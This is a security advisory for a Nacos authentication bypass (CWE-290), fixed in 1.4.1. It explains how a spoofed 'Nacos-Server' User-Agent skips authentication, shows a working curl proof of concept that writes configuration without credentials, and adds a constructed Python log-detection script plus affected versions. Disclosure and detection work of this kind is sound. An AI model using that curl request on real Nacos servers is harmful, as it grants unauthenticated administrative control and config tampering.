GHSA-36hp-jr8h-556f

Source
https://github.com/advisories/GHSA-36hp-jr8h-556f
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/04/GHSA-36hp-jr8h-556f/GHSA-36hp-jr8h-556f.json
JSON Data
https://api.test.osv.dev/v1/vulns/GHSA-36hp-jr8h-556f
Aliases
Published
2021-04-27T20:09:17Z
Modified
2024-12-02T05:46:00.708163Z
Summary
Authentication Bypass
Details

When configured to use authentication (-Dnacos.core.auth.enabled=true), Nacos uses the AuthFilter servlet filter to enforce authentication. This filter contains a bypass intended for server-to-server traffic: a request that presents itself as coming from another Nacos server is allowed through the filter and skips the authentication checks entirely. The decision is based solely on the User-Agent HTTP header, which is fully client-controlled, so the bypass is trivially spoofed by any client.

The following request to the configuration endpoint is rejected because it supplies no credentials:

❯ curl -X POST "http://127.0.0.1:8848/nacos/v1/cs/configs?dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld"
{"timestamp":"2020-12-02T14:33:57.154+0000","status":403,"error":"Forbidden","message":"unknown user!","path":"/nacos/v1/cs/configs"}

However, the same request is accepted when it carries the Nacos-Server User-Agent header (curl's -A flag sets the header; no credentials are supplied):

❯ curl -X POST -A Nacos-Server "http://127.0.0.1:8848/nacos/v1/cs/configs?dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld"
true

Impact

This issue allows any unauthenticated client that can reach the Nacos HTTP API to carry out any administrative task on the Nacos server, such as writing configuration as shown above.
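Because the bypass is keyed on a client-supplied header, requests claiming to be a Nacos server but arriving from an address that is not a cluster member are a direct detection signal. The following is an added example, not code from the advisory or from the Nacos project. It assumes access logs in the common "combined" format as a reverse proxy in front of Nacos would write them (Nacos does not emit this format itself), and a cluster membership list standing in for cluster.conf; both the log lines and the membership list are constructed for the example.

```python
import re
from ipaddress import ip_address, ip_network

# Constructed sample access log (combined format, assumed to come from a reverse
# proxy in front of Nacos). Line 3 mirrors the spoofed request in the advisory:
# an external client writes configuration with a forged Nacos-Server User-Agent.
SAMPLE_LOG = """\
10.0.0.11 - - [02/Dec/2020:14:33:50 +0000] "POST /nacos/v1/ns/instance/beat HTTP/1.1" 200 17 "-" "Nacos-Server"
203.0.113.7 - - [02/Dec/2020:14:33:57 +0000] "POST /nacos/v1/cs/configs?dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld HTTP/1.1" 403 118 "-" "curl/7.64.1"
203.0.113.7 - - [02/Dec/2020:14:34:10 +0000] "POST /nacos/v1/cs/configs?dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld HTTP/1.1" 200 4 "-" "Nacos-Server"
192.168.1.5 - - [02/Dec/2020:14:35:02 +0000] "GET /nacos/v1/auth/users?pageNo=1&pageSize=9 HTTP/1.1" 200 212 "-" "Nacos-Server"
10.0.0.12 - - [02/Dec/2020:14:35:30 +0000] "GET /nacos/index.html HTTP/1.1" 200 3456 "-" "Mozilla/5.0"
"""

# Assumed cluster membership (what cluster.conf would list), constructed for the example.
CLUSTER_MEMBERS = ["10.0.0.0/24"]

# Combined log format: ip ident user [ts] "METHOD path proto" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)


def parse_line(line):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def is_cluster_member(ip, members=CLUSTER_MEMBERS):
    """True if ip falls inside any of the member networks; unparsable ips are not members."""
    try:
        addr = ip_address(ip)
    except ValueError:
        return False
    return any(addr in ip_network(n, strict=False) for n in members)


def find_spoofed_server_requests(log_text, members=CLUSTER_MEMBERS):
    """Return records of /nacos/ requests that claim the Nacos-Server User-Agent
    but originate outside the cluster. Matching is case-insensitive substring
    matching on the User-Agent (an assumption; the advisory shows only the exact
    value Nacos-Server). A 200 on such a request means the bypass succeeded."""
    hits = []
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if rec is None:
            continue
        if "nacos-server" not in rec["ua"].lower():
            continue
        if not rec["path"].startswith("/nacos/"):
            continue
        if is_cluster_member(rec["ip"], members):
            continue  # legitimate inter-node traffic
        hits.append(rec)
    return hits


if __name__ == "__main__":
    for h in find_spoofed_server_requests(SAMPLE_LOG):
        print(f'{h["ts"]} {h["ip"]} {h["method"]} {h["path"]} -> {h["status"]} (UA: {h["ua"]})')
```

Two of the five constructed lines are flagged: the forged config write from 203.0.113.7 and a user-listing call from 192.168.1.5; the genuine heartbeat from 10.0.0.11 is ignored because it comes from the cluster range. On a patched server the same query is still worth running, since a spoofed header from outside the cluster is reconnaissance regardless of whether the request succeeded.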

Database specific
{
    "nvd_published_at": "2021-04-27T21:15:00Z",
    "cwe_ids": [
        "CWE-290"
    ],
    "severity": "HIGH",
    "github_reviewed": true,
    "github_reviewed_at": "2021-04-27T20:08:38Z"
}
References

Affected packages

Maven / com.alibaba.nacos:nacos-common

Package

Name
com.alibaba.nacos:nacos-common
Purl
pkg:maven/com.alibaba.nacos/nacos-common

Affected ranges

Type
ECOSYSTEM
Events
Introduced
0 (unknown introduced version; all previous versions are affected)
Fixed
1.4.1

Affected versions

0.*

0.1.0
0.2.0
0.2.1-RC1
0.2.1
0.3.0-RC1
0.3.0
0.4.0
0.5.0
0.6.0
0.6.1
0.6.2
0.8.0
0.8.1
0.8.2
0.9.0
0.9.1

1.*

1.0.0-RC1
1.0.0-RC2
1.0.0-RC3
1.0.0-RC4
1.0.0
1.0.1
1.1.0
1.1.1
1.1.2
1.1.3
1.1.4
1.2.0-beta.0
1.2.0-beta.1
1.2.0
1.2.1
1.3.0
1.3.1-BETA
1.3.1-BETA.1
1.3.1
1.3.2
1.3.3
1.4.0-BETA
1.4.0